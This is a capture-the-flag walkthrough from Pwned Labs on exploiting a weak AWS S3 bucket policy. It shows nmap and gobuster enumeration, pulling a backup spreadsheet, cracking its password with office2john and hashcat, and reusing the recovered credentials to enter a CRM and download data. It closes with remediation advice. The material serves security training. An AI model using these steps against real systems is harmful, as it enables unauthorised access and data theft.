Exploiting Weak S3 Bucket Policies
A walkthrough demonstrating how weak S3 Bucket policies can lead to system compromise, data exposure and exfiltration.
CTF Source: Pwned Labs
Overview
In this walkthrough, we're tasked with accessing sensitive data and demonstrating the extent of impact using an IP address and some AWS Access Keys discovered on a previous engagement.
Pre-Requisites
Install awscli: `brew install awscli` (mac), `apt install awscli` (linux)
Install nmap: `brew install nmap` (mac), `apt install nmap` (linux)
Install gobuster: `brew install gobuster` (mac), `apt install gobuster` (linux)
Install hashcat: `brew install hashcat` (mac), `apt install hashcat` (linux)
Install John the Ripper: `brew install john` (mac), `apt install john` (linux)
Walkthrough
To start, we're given the IP address `13.43.144.61` and some AWS access keys for a user named `test`.
Nmap Enumeration
After configuring our AWS access keys (`aws configure`), let's run some nmap scans and see what we're dealing with.
Alright, so it looks like we're dealing with a website on port 3000.
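The setup and scan might look like the following sketch (the nmap flags are my own choices, not necessarily the exact ones used in the lab):

```shell
# Configure the discovered keys as the default profile
# (enter the access key ID, secret access key, and region when prompted)
aws configure

# Quick sweep of all TCP ports, then service/version detection on what's open
nmap -p- --min-rate 1000 13.43.144.61
nmap -sV -p 3000 13.43.144.61
```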
Gobuster Enumeration
Before we view the web page in the browser, let’s kick off a gobuster scan.
Gobuster will iterate over our wordlist and attempt to find other directories that may exist. The `-b 404` flag means we'll hide any results that do not exist.
Let's let this run and come back to it later.
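The invocation could look like this (the wordlist path is an assumption; Kali ships several under `/usr/share/wordlists`):

```shell
# Directory brute-force against the web app; -b 404 blacklists "not found" responses
gobuster dir -u http://13.43.144.61:3000 \
  -w /usr/share/wordlists/dirb/common.txt \
  -b 404
```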
Website Enumeration
We can view the site in our browser but it looks like a pretty standard website.
Looking at the source code, though, we find an S3 bucket endpoint!
S3 Bucket Enumeration
It doesn’t appear we can see the data from the browser.
Let's try the AWS CLI instead. Both of these commands fail, but the command to retrieve the bucket policy works!
Check that out! Let's copy that `backup.xlsx` file locally, since we have the `s3:GetObject` permission.
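For reference, the CLI calls could look like this sketch. The bucket name comes from the site's source code, so it's a placeholder here, and the two failing commands are my guess at the usual suspects:

```shell
# These typically fail with AccessDenied for the "test" user
aws s3 ls s3://<bucket-name>
aws s3api get-bucket-acl --bucket <bucket-name>

# Reading the bucket policy is allowed...
aws s3api get-bucket-policy --bucket <bucket-name>

# ...and so is s3:GetObject, which lets us pull the backup file
aws s3 cp s3://<bucket-name>/backup.xlsx .
```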
If we try to open the file we’ll see it’s password protected.
Cracking the Password with Hashcat
Let's attempt to crack the password on this `xlsx` file.
Since I'm on Kali Linux, I'm going to run a tool called `office2john`, because this is a Microsoft Office file.
You can find the full toolset here.
Now we have a hash of the file and it looks like it’s an Office 2013 file.
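Extracting the hash might look like this (the output filename is my own; on Kali the script may live at `/usr/share/john/office2john.py` if it's not on your PATH):

```shell
# Convert the password-protected workbook into a crackable hash
office2john backup.xlsx > backup.hash
cat backup.hash
```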
Next, we will use a tool called `hashcat` and attempt to crack the file password.
First, we need to determine the hash type to use. We can do this like so: `hashcat --help | grep Office`
So our hash type is `9600`.
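That lookup is just a grep over hashcat's built-in mode listing:

```shell
# Find the right hashcat mode for Office documents;
# mode 9600 corresponds to MS Office 2013
hashcat --help | grep Office
```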
Now let’s verify the hash is in the correct format.
We can refer to hashcat’s documentation and look for an example of an Office 2013 hash.
If we compare this to the hash generated by `office2john`, we see we need to modify the hash and remove the leading `backup.xlsx:` prefix.
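One way to strip the filename prefix is with `sed`. The hash below is a dummy stand-in for illustration; in the lab you'd run the `sed` line against the real `backup.hash`:

```shell
# Dummy stand-in for the office2john output (real hashes are much longer)
printf '%s\n' 'backup.xlsx:$office$*2013*100000*256*16*aabbcc' > backup.hash

# office2john prefixes each hash with "<filename>:"; hashcat expects the
# bare $office$... string, so strip the prefix in place
sed -i 's/^backup\.xlsx://' backup.hash
cat backup.hash
```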
Let's run the cracking with a popular wordlist, `rockyou`.
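A typical invocation (the wordlist path is the Kali default; you may need to `gunzip /usr/share/wordlists/rockyou.txt.gz` first):

```shell
# Mode 9600 = MS Office 2013; -a 0 = straight dictionary attack
hashcat -m 9600 -a 0 backup.hash /usr/share/wordlists/rockyou.txt
```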
We cracked the password!
Side note: if you rerun this command, it won't return the password. This is because it was already cracked and is stored in the potfile located at `~/.local/share/hashcat/hashcat.potfile`.
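To re-display a previously cracked password from the potfile, use `--show`:

```shell
# Print hash:password pairs already stored in the potfile instead of re-cracking
hashcat -m 9600 backup.hash --show
```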
Now we can open that `xlsx` file and find a ton of credentials to several systems!
Gaining Access to the Website
Remember the `gobuster` scan we ran earlier? Let's check on how it's going.
Looks like we successfully found some more directories!
If we navigate to `http://13.43.144.61:3000/crm`, we're met with a login page.
Let's try the credentials from our file for the `WebCRM` system to see if they work.
We’re in!
Exfiltrating Data and Finding the Flag!
Poking around, we can find some Invoice data. We’ll download that since there isn’t much else to do.
Opening this up we find the Flag!
Wrap Up
In this scenario, we were tasked with accessing sensitive data with AWS credentials discovered in a previous engagement. After enumerating our access to an S3 bucket we found a password-protected file. After cracking this file, it revealed credentials to several systems. Using these credentials, we gained access to the CRM platform and obtained access to sensitive data. Here are some recommended actions administrators can take to prevent this from happening.
Tighten the S3 Bucket Policy
"Everyone" could perform the following actions:
- `s3:GetBucketPolicy`: not needed by everyone; restrict to admins
- `s3:GetObject`: okay for a website, but non-website data was also stored in this bucket (see #2)
- `s3:GetObjectAcl`: not needed by everyone; restrict to admins
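As a sketch, a tightened policy that keeps anonymous reads but scopes them to website content could be applied like this (the bucket name and the `website/` prefix are placeholders):

```shell
# Grant anonymous users only s3:GetObject, and only on website content;
# GetBucketPolicy and GetObjectAcl are no longer granted to everyone
cat > tightened-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicReadWebsiteContentOnly",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::<bucket-name>/website/*"
    }
  ]
}
EOF

aws s3api put-bucket-policy --bucket <bucket-name> --policy file://tightened-policy.json
```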
Eliminate S3 bucket multi-use
Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.
Since this bucket is hosting a publicly accessible website, only store files relevant to the website.
Ensure employees are trained and have access to a credential manager
In this case, a spreadsheet was found containing login credentials to several systems.
Securely store credentials in solutions such as Bitwarden, 1Password, AWS Secrets Manager, HashiCorp Vault, or similar.
Secure login to CRM system
Protect access to the CRM system by removing (or restricting) public access, restricting login behind SSO, and requiring MFA.